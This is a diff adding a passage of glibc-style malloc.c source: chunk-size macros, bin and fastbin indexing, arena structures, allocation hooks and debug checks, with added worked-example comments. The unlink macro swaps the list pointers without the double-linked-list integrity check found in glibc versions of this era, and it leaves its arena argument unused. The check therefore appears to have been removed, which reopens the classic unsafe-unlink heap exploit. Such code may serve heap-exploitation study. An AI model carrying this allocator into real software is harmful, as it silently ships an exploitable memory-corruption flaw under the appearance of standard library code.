+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
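+
+/*
+  Worked example (not from the original source), assuming a 64-bit
+  build where SIZE_SZ == 8, MALLOC_ALIGN_MASK == 15 and MINSIZE == 32:
+
+    request2size (0)  == 32      (too small; bumped up to MINSIZE)
+    request2size (24) == (24 + 8 + 15) & ~15 == 32
+    request2size (25) == (25 + 8 + 15) & ~15 == 48
+
+  i.e. 24 bytes is the largest request that still fits in a minimal
+  0x20-byte chunk, because the next chunk's prev_size field can be
+  borrowed for user data while this chunk is in use.
+*/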
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
+
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))
+
+/* Ptr to previous physical malloc_chunk */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - ((p)->prev_size)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->size = (((p)->size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
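+
+/*
+  Worked example (not from the original source): with SIZE_BITS == 0x7,
+  a size field of 0x25 decodes as
+
+    chunksize (p)            == 0x25 & ~0x7 == 0x20
+    prev_inuse (p)           != 0            (bit 0x1 set)
+    chunk_is_mmapped (p)     == 0            (bit 0x2 clear)
+    chunk_non_main_arena (p) != 0            (bit 0x4 set)
+
+  i.e. a 0x20-byte chunk from a non-main arena whose lower neighbour is
+  in use.
+*/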
+
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4-byte
+   pointers and size_t).
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+#define unlink(AV, P, BK, FD) {\
+    FD = P->fd;\
+    BK = P->bk;\
+    FD->bk = BK;\
+    BK->fd = FD;\
+    if (!in_smallbin_range (P->size)\
+        && __builtin_expect (P->fd_nextsize != NULL, 0)) {\
+            if (FD->fd_nextsize == NULL) {\
+                if (P->fd_nextsize == P)\
+                  FD->fd_nextsize = FD->bk_nextsize = FD;\
+                else {\
+                    FD->fd_nextsize = P->fd_nextsize;\
+                    FD->bk_nextsize = P->bk_nextsize;\
+                    P->fd_nextsize->bk_nextsize = FD;\
+                    P->bk_nextsize->fd_nextsize = FD;\
+                }\
+            } else {\
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;\
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;\
+            }\
+    }\
+}
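+
+/*
+  Worked example (not from the original source), assuming a 64-bit
+  build where offsetof (struct malloc_chunk, fd) == 16: bin_at (m, 1)
+  evaluates to (char *) &m->bins[0] - 16, so the resulting "chunk" has
+
+    bin_at (m, 1)->fd  at &m->bins[0]
+    bin_at (m, 1)->bk  at &m->bins[1]
+
+  while its prev_size/size members overlay whatever happens to precede
+  bins[] in malloc_state.  Only the fd/bk fields of these bin headers
+  are ever accessed, which is exactly the space-saving trick described
+  above.
+*/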
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
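+
+/*
+  Worked example (not from the original source), assuming a 64-bit
+  build where SIZE_SZ == 8, SMALLBIN_WIDTH == 16 and
+  MIN_LARGE_SIZE == 1024:
+
+    bin_index (0x20)  == smallbin_index (0x20)     == 2
+    bin_index (0x3f0) == smallbin_index (0x3f0)    == 63
+    bin_index (0x400) == largebin_index_64 (0x400) == 48 + (0x400 >> 6) == 64
+
+  so chunk sizes 0x20 .. 0x3f0 map onto small bins 2 .. 63, and 0x400 is
+  the first size handled by the large bins.
+*/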
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even on a 64-bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
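+
+/*
+  Worked example (not from the original source): with BINMAPSHIFT == 5,
+  marking bin 66 sets bit (66 & 31) == 2 in binmap word
+  idx2block (66) == 2, i.e. binmap[2] |= 0x4.  A malloc scan that finds
+  the bit set but the bin empty simply clears it again via unmark_bin.
+*/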
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
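+
+/*
+  Worked example (not from the original source), assuming a 64-bit
+  build where SIZE_SZ == 8: fastbin_index (0x20) == (0x20 >> 4) - 2 == 0
+  and fastbin_index (0x80) == 6, so with the default global_max_fast of
+  0x80 only fastbins 0 .. 6 are populated; NFASTBINS itself is sized
+  for the larger MAX_FAST_SIZE that mallopt (M_MXFAST, ...) may select.
+*/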
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  mutex_t mutex;
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  /*INTERNAL_SIZE_T  sbrked_mem;*/
+  /*INTERNAL_SIZE_T  max_sbrked_mem;*/
+  INTERNAL_SIZE_T max_mmapped_mem;
+  INTERNAL_SIZE_T max_total_mem;  /* only kept for NO_THREADS */
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+
+/*  Non public mallopt parameters.  */
+#define M_ARENA_TEST -7
+#define M_ARENA_MAX  -8
+
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs to
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((p->prev_size + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (next->prev_size == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_non_main_arena (p))
+        assert (av != &main_arena);
+      else
+        assert (av == &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
